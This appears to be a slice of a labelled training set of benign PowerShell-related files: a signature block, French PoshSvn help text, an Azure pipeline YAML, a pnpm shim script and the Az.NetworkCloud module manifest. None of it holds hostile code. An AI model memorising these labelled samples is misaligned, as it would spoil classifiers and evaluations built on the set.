# c29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwMA0GCSqGSIb3DQEBCwUAAgUA6smdRzAi
# GA8yMDI0MTAyODA1MTkwM1oYDzIwMjQxMDI5MDUxOTAzWjB0MDoGCisGAQQBhFkK
# BAExLDAqMAoCBQDqyZ1HAgEAMAcCAQACAh8PMAcCAQACAhQSMAoCBQDqyu7HAgEA
# MDYGCisGAQQBhFkKBAIxKDAmMAwGCisGAQQBhFkKAwKgCjAIAgEAAgMHoSChCjAI
# AgEAAgMBhqAwDQYJKoZIhvcNAQELBQADggEBAMgszoIDg2o9tGcYXJy12HtzVNFW
# M2U6+uXp/lZFN9GfKyEAtrE+WzK6IRGIcVwMQ88Li4P2eAY/JRqLae0FqcCpM7fV
# KJCew6OG7JkRgr5zDklXZmeDXlSCV3g/wV51WFpAIuTVjd9LCV+YKpMLsnI+0mnr
# KlnQGDVkrOH7GF9HYG+2JKF6eLr7JTYAwZCTpXYkfuWY4z3EKTTola7G9slIo7n5
# dTdvC9qaCYqt+eSrC5+s3smEjVTxn6EEPDjDmnaAJfLiZAsBGo6VEBm6tEV77qnm
# V9xpIrErypW2LN6/e4lrLQJO3X5elf7PvUwi0ogdjF4wv5DRTrY4TQMJ+oMxggQN
# MIIECQIBATCBkzB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQ
# MA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9u
# MSYwJAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMAITMwAAAehQ
# sIDPK3KZTQABAAAB6DANBglghkgBZQMEAgEFAKCCAUowGgYJKoZIhvcNAQkDMQ0G
# CyqGSIb3DQEJEAEEMC8GCSqGSIb3DQEJBDEiBCAJeoUXxIVF/FZLlXRFVyrZO3/I
# J7a2oVUZEszquqpJPjCB+gYLKoZIhvcNAQkQAi8xgeowgecwgeQwgb0EICrS2sTV
# AoQggkHR59pNqige0xfJT2J3U8W1Sc8H+OsdMIGYMIGApH4wfDELMAkGA1UEBhMC
# VVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNV
# BAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRp
# bWUtU3RhbXAgUENBIDIwMTACEzMAAAHoULCAzytymU0AAQAAAegwIgQgLUsjW5We
# q4WPeaZKqGRCLipnTqgXs5A+dsy2nUeh3x4wDQYJKoZIhvcNAQELBQAEggIAqXlK
# N+6cyPt0zFCuofrP5mlHwdfNY1wAJFLj+OwVjkn8iZBj9LfLryCQBLcyhN+98p8U
# v++GpdVM7mOpd8NhRBzDrnqXwicxg0V7mN1rMt8imcdmlK9FAH/GZyCnFVWL+z3+
# SK40P3ySt5J64Z1InzAwWkjl4wznniAYKDdSMbWeVm8WCu+j/DBnrxk7oEXQuG6p
# Sht6q9yOxXaxo4eC7HhGD/WI8E+z0eqC0QHXTfnCJivP8i6O3PrrtD8XENturjsb
# pk+rDCb2pSlKoS0+L8PjBfyIXbeO3FOOZad1CFsGHWLeuwvrjYwo0dQur38VOtsb
# DsFd34t+rWZzNdSfio88NRc5Mgqq11nQ99Wnoq6/8lYHduVhDY+AFz9Wk2cAVhn8
# m2/avMN5r0vJhabgtx+HX+d/TzzRj/RD8bJ0iYMGSoeWRmiWfASwggqNwYbPQMlu
# uMFxowWvIXdAZ22+nEV9eEt4T1v07t5dkZmCalrFZc863vi4QDsX4VaEbhAL/A6U
# S4fTeze1ssnox1rRkJTpH7owx8RUWkHJ5FbNuDSFrEHDl1D4IaaqPItqZ1pclDNv
# LCNXBj+9tCzRzsWo9l+rJGkNmxKCKx/MpuhdKspauuK1SYqhbRQvPYZpZ+QS71aM
# D7ymuQAn9mlVAIxknY1AdoKPMDfPDhAxoMsPk7A=
# SIG # End signature block
|
combined_dataset/train/non-malicious/sample_24_68.ps1
|
sample_24_68.ps1
|
TOPIC
about_poshsvntarget
Short description
Description de la façon de spécifier la cible d'une cmdlet.
Long description
Certaines opérations Subversion prennent en charge la spécification d'un
chemin local vers une copie de travail ou d'une URL distante vers un dépôt
en tant que cible.
Vous pouvez spécifier la cible de l'opération en définissant le paramètre
`-Target` sur soit un chemin ou une URL. Cependant, si vous préférez
indiquer directement s'il s'agit d'une URL ou d'un chemin, utilisez la
cmdlet New-SvnTarget et spécifiez la cible via les paramètres `-Url` ou
`-Path` respectivement.
SPÉCIFICATION DE LA CIBLE VIA LE PARAMÈTRE `-TARGET`
Cette méthode de spécification de la cible est optimale pour une utilisation
de base de Subversion. Vous pouvez passer soit un chemin ou une URL au
paramètre `-Target`, que PoshSvn interprétera en conséquence.
Les exemples suivants récupèrent `svn-info` depuis le dépôt distant et la
copie de travail :
svn-info -Target https://svn.apache.org/repos/asf/serf/trunk
svn-info -Target .\chemin\vers\wc
Cependant, vous n'avez pas besoin d'écrire `-Target` avant de spécifier la
cible, car il accepte la valeur des arguments restants. C'est pourquoi cela
répète presque le comportement de l'interface en ligne de commande de
Subversion :
svn-info https://svn.apache.org/repos/asf/serf/trunk
svn-info .\chemin\vers\wc
Dans certaines cmdlets, si aucune cible n'est spécifiée, PoshSvn utilisera
par défaut le répertoire actuel. Cela signifie que l'exemple suivant
récupérera `svn-info` à propos de la copie de travail située à
`C:\chemin\vers\wc` :
cd C:\chemin\vers\wc
svn-info
SPÉCIFICATION DE LA CIBLE EN INDIQUANT DIRECTEMENT SON TYPE
Si vous écrivez un script, vous pouvez spécifier explicitement si la cible
est une URL ou un chemin. Cette approche est optimale pour les scripts car
elle garantit la lisibilité, la compréhension et aide à éviter les erreurs
causées par une détection incorrecte du type de cible :
svn-info (New-SvnTarget -Url https://svn.apache.org/repos/asf/serf/trunk)
svn-info (New-SvnTarget -Path .\chemin\vers\wc)
Si vous préférez, vous pouvez utiliser une variable pour la cible de la
cmdlet. Par exemple :
# Créer la cible
$cible = (New-SvnTarget -Url https://svn.apache.org/repos/asf/serf/trunk)
# Afficher la cible
Write-Output $cible
# Appeler svn-info
svn-info -Target $cible
Si une cible avec un type différent est spécifiée, cela entraînera une
erreur :
svn-info (New-SvnTarget -Path https://svn.apache.org/repos/asf/serf/trunk)
# Erreur
svn-info (New-SvnTarget -Url .\chemin\vers\wc)
# Erreur
De plus, vous pouvez utiliser la variable
`$PSScriptRoot`
si votre copie de travail est située près du script. Cette variable
automatique fournit le chemin vers le répertoire contenant le script.
svn-info (New-SvnTarget -Path $PSScriptRoot\chemin\vers\wc)
|
combined_dataset/train/non-malicious/sample_57_68.ps1
|
sample_57_68.ps1
|
parameters:
configuration: 'Debug'
# Optional: condition for the job to run
condition: ''
# Optional: 'true' if future jobs should run even if this job fails
continueOnError: false
# Optional: dependencies of the job
dependsOn: ''
# Optional: Include PublishBuildArtifacts task
enablePublishBuildArtifacts: false
# Optional: A defined YAML pool - https://docs.microsoft.com/en-us/azure/devops/pipelines/yaml-schema?view=vsts&tabs=schema#pool
pool: {}
# Optional: should run as a public build even in the internal project
# if 'true', the build won't run any of the internal only steps, even if it is running in non-public projects.
runAsPublic: false
# Optional: whether the build's artifacts will be published using release pipelines or direct feed publishing
publishUsingPipelines: false
# Optional: whether the build's artifacts will be published using release pipelines or direct feed publishing
publishAssetsImmediately: false
artifactsPublishingAdditionalParameters: ''
signingValidationAdditionalParameters: ''
jobs:
- job: Asset_Registry_Publish
dependsOn: ${{ parameters.dependsOn }}
timeoutInMinutes: 150
${{ if eq(parameters.publishAssetsImmediately, 'true') }}:
displayName: Publish Assets
${{ else }}:
displayName: Publish to Build Asset Registry
variables:
- template: /eng/common/templates-official/variables/pool-providers.yml
- ${{ if and(eq(parameters.runAsPublic, 'false'), ne(variables['System.TeamProject'], 'public'), notin(variables['Build.Reason'], 'PullRequest')) }}:
- group: Publish-Build-Assets
- group: AzureDevOps-Artifact-Feeds-Pats
- name: runCodesignValidationInjection
value: false
- ${{ if eq(parameters.publishAssetsImmediately, 'true') }}:
- template: /eng/common/templates-official/post-build/common-variables.yml
pool:
# We don't use the collection uri here because it might vary (.visualstudio.com vs. dev.azure.com)
${{ if eq(variables['System.TeamProject'], 'DevDiv') }}:
name: AzurePipelines-EO
image: 1ESPT-Windows2022
demands: Cmd
os: windows
# If it's not devdiv, it's dnceng
${{ if ne(variables['System.TeamProject'], 'DevDiv') }}:
name: NetCore1ESPool-Publishing-Internal
image: windows.vs2019.amd64
os: windows
steps:
- ${{ if and(eq(parameters.runAsPublic, 'false'), ne(variables['System.TeamProject'], 'public'), notin(variables['Build.Reason'], 'PullRequest')) }}:
- task: DownloadBuildArtifacts@0
displayName: Download artifact
inputs:
artifactName: AssetManifests
downloadPath: '$(Build.StagingDirectory)/Download'
checkDownloadedFiles: true
condition: ${{ parameters.condition }}
continueOnError: ${{ parameters.continueOnError }}
- task: NuGetAuthenticate@1
- task: PowerShell@2
displayName: Publish Build Assets
inputs:
filePath: eng\common\sdk-task.ps1
arguments: -task PublishBuildAssets -restore -msbuildEngine dotnet
/p:ManifestsPath='$(Build.StagingDirectory)/Download/AssetManifests'
/p:BuildAssetRegistryToken=$(MaestroAccessToken)
/p:MaestroApiEndpoint=https://maestro-prod.westus2.cloudapp.azure.com
/p:PublishUsingPipelines=${{ parameters.publishUsingPipelines }}
/p:OfficialBuildId=$(Build.BuildNumber)
condition: ${{ parameters.condition }}
continueOnError: ${{ parameters.continueOnError }}
- task: powershell@2
displayName: Create ReleaseConfigs Artifact
inputs:
targetType: inline
script: |
New-Item -Path "$(Build.StagingDirectory)/ReleaseConfigs" -ItemType Directory -Force
$filePath = "$(Build.StagingDirectory)/ReleaseConfigs/ReleaseConfigs.txt"
Add-Content -Path $filePath -Value $(BARBuildId)
Add-Content -Path $filePath -Value "$(DefaultChannels)"
Add-Content -Path $filePath -Value $(IsStableBuild)
- task: 1ES.PublishBuildArtifacts@1
displayName: Publish ReleaseConfigs Artifact
inputs:
PathtoPublish: '$(Build.StagingDirectory)/ReleaseConfigs'
PublishLocation: Container
ArtifactName: ReleaseConfigs
- task: powershell@2
displayName: Check if SymbolPublishingExclusionsFile.txt exists
inputs:
targetType: inline
script: |
$symbolExclusionfile = "$(Build.SourcesDirectory)/eng/SymbolPublishingExclusionsFile.txt"
if(Test-Path -Path $symbolExclusionfile)
{
Write-Host "SymbolExclusionFile exists"
Write-Host "##vso[task.setvariable variable=SymbolExclusionFile]true"
}
else{
Write-Host "Symbols Exclusion file does not exists"
Write-Host "##vso[task.setvariable variable=SymbolExclusionFile]false"
}
- task: 1ES.PublishBuildArtifacts@1
displayName: Publish SymbolPublishingExclusionsFile Artifact
condition: eq(variables['SymbolExclusionFile'], 'true')
inputs:
PathtoPublish: '$(Build.SourcesDirectory)/eng/SymbolPublishingExclusionsFile.txt'
PublishLocation: Container
ArtifactName: ReleaseConfigs
- ${{ if eq(parameters.publishAssetsImmediately, 'true') }}:
- template: /eng/common/templates-official/post-build/setup-maestro-vars.yml
parameters:
BARBuildId: ${{ parameters.BARBuildId }}
PromoteToChannelIds: ${{ parameters.PromoteToChannelIds }}
- task: PowerShell@2
displayName: Publish Using Darc
inputs:
filePath: $(Build.SourcesDirectory)/eng/common/post-build/publish-using-darc.ps1
arguments: -BuildId $(BARBuildId)
-PublishingInfraVersion 3
-AzdoToken '$(publishing-dnceng-devdiv-code-r-build-re)'
-MaestroToken '$(MaestroApiAccessToken)'
-WaitPublishingFinish true
-ArtifactsPublishingAdditionalParameters '${{ parameters.artifactsPublishingAdditionalParameters }}'
-SymbolPublishingAdditionalParameters '${{ parameters.symbolPublishingAdditionalParameters }}'
- ${{ if eq(parameters.enablePublishBuildArtifacts, 'true') }}:
- template: /eng/common/templates-official/steps/publish-logs.yml
parameters:
JobLabel: 'Publish_Artifacts_Logs'
|
combined_dataset/train/non-malicious/sample_31_21.ps1
|
sample_31_21.ps1
|
#!/usr/bin/env pwsh
$basedir=Split-Path $MyInvocation.MyCommand.Definition -Parent
$exe=""
$pathsep=":"
$env_node_path=$env:NODE_PATH
$new_node_path="C:\Users\abder\component-maker\web\node_modules\.pnpm\he@1.2.0\node_modules\he\bin\node_modules;C:\Users\abder\component-maker\web\node_modules\.pnpm\he@1.2.0\node_modules\he\node_modules;C:\Users\abder\component-maker\web\node_modules\.pnpm\he@1.2.0\node_modules;C:\Users\abder\component-maker\web\node_modules\.pnpm\node_modules"
if ($PSVersionTable.PSVersion -lt "6.0" -or $IsWindows) {
# Fix case when both the Windows and Linux builds of Node
# are installed in the same directory
$exe=".exe"
$pathsep=";"
} else {
$new_node_path="/mnt/c/Users/abder/component-maker/web/node_modules/.pnpm/he@1.2.0/node_modules/he/bin/node_modules:/mnt/c/Users/abder/component-maker/web/node_modules/.pnpm/he@1.2.0/node_modules/he/node_modules:/mnt/c/Users/abder/component-maker/web/node_modules/.pnpm/he@1.2.0/node_modules:/mnt/c/Users/abder/component-maker/web/node_modules/.pnpm/node_modules"
}
if ([string]::IsNullOrEmpty($env_node_path)) {
$env:NODE_PATH=$new_node_path
} else {
$env:NODE_PATH="$new_node_path$pathsep$env_node_path"
}
$ret=0
if (Test-Path "$basedir/node$exe") {
# Support pipeline input
if ($MyInvocation.ExpectingInput) {
$input | & "$basedir/node$exe" "$basedir/../../bin/he" $args
} else {
& "$basedir/node$exe" "$basedir/../../bin/he" $args
}
$ret=$LASTEXITCODE
} else {
# Support pipeline input
if ($MyInvocation.ExpectingInput) {
$input | & "node$exe" "$basedir/../../bin/he" $args
} else {
& "node$exe" "$basedir/../../bin/he" $args
}
$ret=$LASTEXITCODE
}
$env:NODE_PATH=$env_node_path
exit $ret
|
combined_dataset/train/non-malicious/sample_43_50.ps1
|
sample_43_50.ps1
|
#
# Module manifest for module 'Az.NetworkCloud'
#
# Generated by: Microsoft Corporation
#
# Generated on: 23/04/2024
#
@{
# Script module or binary module file associated with this manifest.
RootModule = 'Az.NetworkCloud.psm1'
# Version number of this module.
ModuleVersion = '1.0.1'
# Supported PSEditions
CompatiblePSEditions = 'Core', 'Desktop'
# ID used to uniquely identify this module
GUID = 'c1da95ce-b8cb-46c5-bb1c-80e3132dbb72'
# Author of this module
Author = 'Microsoft Corporation'
# Company or vendor of this module
CompanyName = 'Microsoft Corporation'
# Copyright statement for this module
Copyright = 'Microsoft Corporation. All rights reserved.'
# Description of the functionality provided by this module
Description = 'Microsoft Azure PowerShell: NetworkCloud cmdlets'
# Minimum version of the PowerShell engine required by this module
PowerShellVersion = '5.1'
# Name of the PowerShell host required by this module
# PowerShellHostName = ''
# Minimum version of the PowerShell host required by this module
# PowerShellHostVersion = ''
# Minimum version of Microsoft .NET Framework required by this module. This prerequisite is valid for the PowerShell Desktop edition only.
DotNetFrameworkVersion = '4.7.2'
# Minimum version of the common language runtime (CLR) required by this module. This prerequisite is valid for the PowerShell Desktop edition only.
# ClrVersion = ''
# Processor architecture (None, X86, Amd64) required by this module
# ProcessorArchitecture = ''
# Modules that must be imported into the global environment prior to importing this module
RequiredModules = @()
# Assemblies that must be loaded prior to importing this module
RequiredAssemblies = 'NetworkCloud.Autorest/bin/Az.NetworkCloud.private.dll'
# Script files (.ps1) that are run in the caller's environment prior to importing this module.
# ScriptsToProcess = @()
# Type files (.ps1xml) to be loaded when importing this module
# TypesToProcess = @()
# Format files (.ps1xml) to be loaded when importing this module
FormatsToProcess = 'NetworkCloud.Autorest\Az.NetworkCloud.format.ps1xml'
# Modules to import as nested modules of the module specified in RootModule/ModuleToProcess
NestedModules = @('NetworkCloud.Autorest/Az.NetworkCloud.psm1')
# Functions to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no functions to export.
FunctionsToExport = 'Deploy-AzNetworkCloudCluster',
'Disable-AzNetworkCloudStorageApplianceRemoteVendorManagement',
'Enable-AzNetworkCloudStorageApplianceRemoteVendorManagement',
'Get-AzNetworkCloudAgentPool', 'Get-AzNetworkCloudBareMetalMachine',
'Get-AzNetworkCloudBareMetalMachineKeySet',
'Get-AzNetworkCloudBmcKeySet', 'Get-AzNetworkCloudCluster',
'Get-AzNetworkCloudClusterManager', 'Get-AzNetworkCloudConsole',
'Get-AzNetworkCloudKubernetesCluster',
'Get-AzNetworkCloudL2Network', 'Get-AzNetworkCloudL3Network',
'Get-AzNetworkCloudMetricsConfiguration', 'Get-AzNetworkCloudRack',
'Get-AzNetworkCloudRackSku', 'Get-AzNetworkCloudServicesNetwork',
'Get-AzNetworkCloudStorageAppliance',
'Get-AzNetworkCloudTrunkedNetwork',
'Get-AzNetworkCloudVirtualMachine', 'Get-AzNetworkCloudVolume',
'Invoke-AzNetworkCloudBareMetalMachineCordon',
'Invoke-AzNetworkCloudBareMetalMachineDataExtract',
'Invoke-AzNetworkCloudBareMetalMachineReimage',
'Invoke-AzNetworkCloudBareMetalMachineReplace',
'Invoke-AzNetworkCloudBareMetalMachineRunCommand',
'Invoke-AzNetworkCloudBareMetalMachineRunReadCommand',
'Invoke-AzNetworkCloudBareMetalMachineUncordon',
'Invoke-AzNetworkCloudClusterVersionUpdate',
'Invoke-AzNetworkCloudVirtualMachineReimage',
'New-AzNetworkCloudAgentPool',
'New-AzNetworkCloudBareMetalMachineConfigurationDataObject',
'New-AzNetworkCloudBareMetalMachineKeySet',
'New-AzNetworkCloudBgpAdvertisementObject',
'New-AzNetworkCloudBgpServiceLoadBalancerConfigurationObject',
'New-AzNetworkCloudBmcKeySet', 'New-AzNetworkCloudCluster',
'New-AzNetworkCloudClusterManager', 'New-AzNetworkCloudConsole',
'New-AzNetworkCloudControlPlaneNodeConfigurationObject',
'New-AzNetworkCloudEgressEndpointObject',
'New-AzNetworkCloudEndpointDependencyObject',
'New-AzNetworkCloudInitialAgentPoolConfigurationObject',
'New-AzNetworkCloudIpAddressPoolObject',
'New-AzNetworkCloudKeySetUserObject',
'New-AzNetworkCloudKubernetesCluster',
'New-AzNetworkCloudL2Network', 'New-AzNetworkCloudL3Network',
'New-AzNetworkCloudL3NetworkAttachmentConfigurationObject',
'New-AzNetworkCloudMetricsConfiguration',
'New-AzNetworkCloudNetworkAttachmentObject',
'New-AzNetworkCloudRackDefinitionObject',
'New-AzNetworkCloudServiceLoadBalancerBgpPeerObject',
'New-AzNetworkCloudServicesNetwork',
'New-AzNetworkCloudStorageApplianceConfigurationDataObject',
'New-AzNetworkCloudTrunkedNetwork',
'New-AzNetworkCloudVirtualMachine',
'New-AzNetworkCloudVirtualMachinePlacementHintObject',
'New-AzNetworkCloudVolume', 'Remove-AzNetworkCloudAgentPool',
'Remove-AzNetworkCloudBareMetalMachineKeySet',
'Remove-AzNetworkCloudBmcKeySet', 'Remove-AzNetworkCloudCluster',
'Remove-AzNetworkCloudClusterManager',
'Remove-AzNetworkCloudConsole',
'Remove-AzNetworkCloudKubernetesCluster',
'Remove-AzNetworkCloudL2Network', 'Remove-AzNetworkCloudL3Network',
'Remove-AzNetworkCloudMetricsConfiguration',
'Remove-AzNetworkCloudServicesNetwork',
'Remove-AzNetworkCloudTrunkedNetwork',
'Remove-AzNetworkCloudVirtualMachine',
'Remove-AzNetworkCloudVolume',
'Restart-AzNetworkCloudBareMetalMachine',
'Restart-AzNetworkCloudKubernetesClusterNode',
'Restart-AzNetworkCloudVirtualMachine',
'Start-AzNetworkCloudBareMetalMachine',
'Start-AzNetworkCloudVirtualMachine',
'Stop-AzNetworkCloudBareMetalMachine',
'Stop-AzNetworkCloudVirtualMachine',
'Update-AzNetworkCloudAgentPool',
'Update-AzNetworkCloudBareMetalMachine',
'Update-AzNetworkCloudBareMetalMachineKeySet',
'Update-AzNetworkCloudBmcKeySet', 'Update-AzNetworkCloudCluster',
'Update-AzNetworkCloudClusterManager',
'Update-AzNetworkCloudConsole',
'Update-AzNetworkCloudKubernetesCluster',
'Update-AzNetworkCloudL2Network', 'Update-AzNetworkCloudL3Network',
'Update-AzNetworkCloudMetricsConfiguration',
'Update-AzNetworkCloudRack', 'Update-AzNetworkCloudServicesNetwork',
'Update-AzNetworkCloudStorageAppliance',
'Update-AzNetworkCloudTrunkedNetwork',
'Update-AzNetworkCloudVirtualMachine',
'Update-AzNetworkCloudVolume'
# Cmdlets to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no cmdlets to export.
CmdletsToExport = @()
# Variables to export from this module
# VariablesToExport = @()
# Aliases to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no aliases to export.
AliasesToExport = @()
# DSC resources to export from this module
# DscResourcesToExport = @()
# List of all modules packaged with this module
# ModuleList = @()
# List of all files packaged with this module
# FileList = @()
# Private data to pass to the module specified in RootModule/ModuleToProcess. This may also contain a PSData hashtable with additional module metadata used by PowerShell.
PrivateData = @{
PSData = @{
# Tags applied to this module. These help with module discovery in online galleries.
Tags = 'Azure','ResourceManager','ARM','PSModule','NetworkCloud'
# A URL to the license for this module.
LicenseUri = 'https://aka.ms/azps-license'
# A URL to the main website for this project.
ProjectUri = 'https://github.com/Azure/azure-powershell'
# A URL to an icon representing this module.
# IconUri = ''
# ReleaseNotes of this module
ReleaseNotes = '* Introduced secrets detection feature to safeguard sensitive data.'
# Prerelease string of this module
# Prerelease = ''
# Flag to indicate whether the module requires explicit user acceptance for install/update/save
# RequireLicenseAcceptance = $false
# External dependent modules of this module
# ExternalModuleDependencies = @()
} # End of PSData hashtable
} # End of PrivateData hashtable
# HelpInfo URI of this module
# HelpInfoURI = ''
# Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix.
# DefaultCommandPrefix = ''
}
# SIG # Begin signature block
# MIInvwYJKoZIhvcNAQcCoIInsDCCJ6wCAQExDzANBglghkgBZQMEAgEFADB5Bgor
# BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG
# KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCAnuFLI4rUH/AJK
# 9i5ERdsrQZpWW6HfBv2BSws/Rsr/DKCCDXYwggX0MIID3KADAgECAhMzAAADrzBA
# DkyjTQVBAAAAAAOvMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD
# VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p
# bmcgUENBIDIwMTEwHhcNMjMxMTE2MTkwOTAwWhcNMjQxMTE0MTkwOTAwWjB0MQsw
# CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u
# ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB
# AQDOS8s1ra6f0YGtg0OhEaQa/t3Q+q1MEHhWJhqQVuO5amYXQpy8MDPNoJYk+FWA
# hePP5LxwcSge5aen+f5Q6WNPd6EDxGzotvVpNi5ve0H97S3F7C/axDfKxyNh21MG
# 0W8Sb0vxi/vorcLHOL9i+t2D6yvvDzLlEefUCbQV/zGCBjXGlYJcUj6RAzXyeNAN
# xSpKXAGd7Fh+ocGHPPphcD9LQTOJgG7Y7aYztHqBLJiQQ4eAgZNU4ac6+8LnEGAL
# go1ydC5BJEuJQjYKbNTy959HrKSu7LO3Ws0w8jw6pYdC1IMpdTkk2puTgY2PDNzB
# tLM4evG7FYer3WX+8t1UMYNTAgMBAAGjggFzMIIBbzAfBgNVHSUEGDAWBgorBgEE
# AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQURxxxNPIEPGSO8kqz+bgCAQWGXsEw
# RQYDVR0RBD4wPKQ6MDgxHjAcBgNVBAsTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEW
# MBQGA1UEBRMNMjMwMDEyKzUwMTgyNjAfBgNVHSMEGDAWgBRIbmTlUAXTgqoXNzci
# tW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8vd3d3Lm1pY3Jvc29mdC5j
# b20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3JsMGEG
# CCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDovL3d3dy5taWNyb3NvZnQu
# Y29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3J0
# MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIBAISxFt/zR2frTFPB45Yd
# mhZpB2nNJoOoi+qlgcTlnO4QwlYN1w/vYwbDy/oFJolD5r6FMJd0RGcgEM8q9TgQ
# 2OC7gQEmhweVJ7yuKJlQBH7P7Pg5RiqgV3cSonJ+OM4kFHbP3gPLiyzssSQdRuPY
# 1mIWoGg9i7Y4ZC8ST7WhpSyc0pns2XsUe1XsIjaUcGu7zd7gg97eCUiLRdVklPmp
# XobH9CEAWakRUGNICYN2AgjhRTC4j3KJfqMkU04R6Toyh4/Toswm1uoDcGr5laYn
# TfcX3u5WnJqJLhuPe8Uj9kGAOcyo0O1mNwDa+LhFEzB6CB32+wfJMumfr6degvLT
# e8x55urQLeTjimBQgS49BSUkhFN7ois3cZyNpnrMca5AZaC7pLI72vuqSsSlLalG
# OcZmPHZGYJqZ0BacN274OZ80Q8B11iNokns9Od348bMb5Z4fihxaBWebl8kWEi2O
# PvQImOAeq3nt7UWJBzJYLAGEpfasaA3ZQgIcEXdD+uwo6ymMzDY6UamFOfYqYWXk
# ntxDGu7ngD2ugKUuccYKJJRiiz+LAUcj90BVcSHRLQop9N8zoALr/1sJuwPrVAtx
# HNEgSW+AKBqIxYWM4Ev32l6agSUAezLMbq5f3d8x9qzT031jMDT+sUAoCw0M5wVt
# CUQcqINPuYjbS1WgJyZIiEkBMIIHejCCBWKgAwIBAgIKYQ6Q0gAAAAAAAzANBgkq
# hkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x
# EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv
# bjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5
# IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEwOTA5WjB+MQswCQYDVQQG
# EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG
# A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQg
# Q29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIIC
# CgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+laUKq4BjgaBEm6f8MMHt03
# a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc6Whe0t+bU7IKLMOv2akr
# rnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4Ddato88tt8zpcoRb0Rrrg
# OGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+lD3v++MrWhAfTVYoonpy
# 4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nkkDstrjNYxbc+/jLTswM9
# sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6A4aN91/w0FK/jJSHvMAh
# dCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmdX4jiJV3TIUs+UsS1Vz8k
# A/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL5zmhD+kjSbwYuER8ReTB
# w3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zdsGbiwZeBe+3W7UvnSSmn
# Eyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3T8HhhUSJxAlMxdSlQy90
# lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS4NaIjAsCAwEAAaOCAe0w
# ggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRIbmTlUAXTgqoXNzcitW2o
# ynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYD
# VR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBDuRQFTuHqp8cx0SOJNDBa
# BgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2Ny
# bC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3JsMF4GCCsG
# AQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3dy5taWNyb3NvZnQuY29t
# L3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3J0MIGfBgNV
# HSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEFBQcCARYzaHR0cDovL3d3
# dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1hcnljcHMuaHRtMEAGCCsG
# AQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkAYwB5AF8AcwB0AGEAdABl
